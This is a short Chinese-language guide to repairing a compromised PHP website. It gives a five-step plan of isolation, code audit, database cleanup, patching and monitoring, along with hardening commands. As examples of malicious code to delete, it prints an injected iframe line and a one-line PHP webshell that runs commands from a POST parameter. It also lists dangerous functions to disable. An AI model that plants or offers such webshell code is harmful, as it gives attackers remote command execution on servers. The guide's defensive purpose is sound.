已经被注入如何修复?数据清洗和漏洞修补?
入侵修复五步法
| 步骤 | 操作内容 | 工具推荐 |
|---|---|---|
| 1. 隔离感染 | 关闭网站并设置503状态码 | Nginx: return 503; |
| 2. 代码审计 | 扫描eval(、base64_decode等危险函数 |
grep -r "eval(" /wwwroot |
| 3. 数据库净化 | 检查<script>标签和可疑Redirect代码 |
SQL: UPDATE posts SET content = REGEXP_REPLACE(...) |
| 4. 漏洞修补 | 更新CMS核心/插件,禁用危险功能 | composer update --no-dev |
| 5. 监控加固 | 部署WAF和文件完整性监控 | ModSecurity + OSSEC |
bash
# 查找最近7天被修改的PHP文件 find /wwwroot -name "*.php" -mtime -7 -exec ls -la {} \; # 典型恶意代码特征(需删除) - `document.write("<iframe src='恶意URL'>")` - `<?php @preg_replace("/.*/e",$_POST['cmd'],""); ?>`- 文件权限控制:
bash
chmod 750 /wwwroot chown www-data:www-data -R /wwwroot - 禁用危险PHP函数:
ini
disable_functions = exec,passthru,shell_exec,system - 数据库防护:
sql
REVOKE FILE ON *.* FROM 'webuser'@'localhost';
- 实时报警:
fail2ban监控异常登录 - 每周扫描:
ClamAV全盘查杀 - 日志分析:
GoAccess分析攻击路径
更新时间:2025-06-22 11:34:57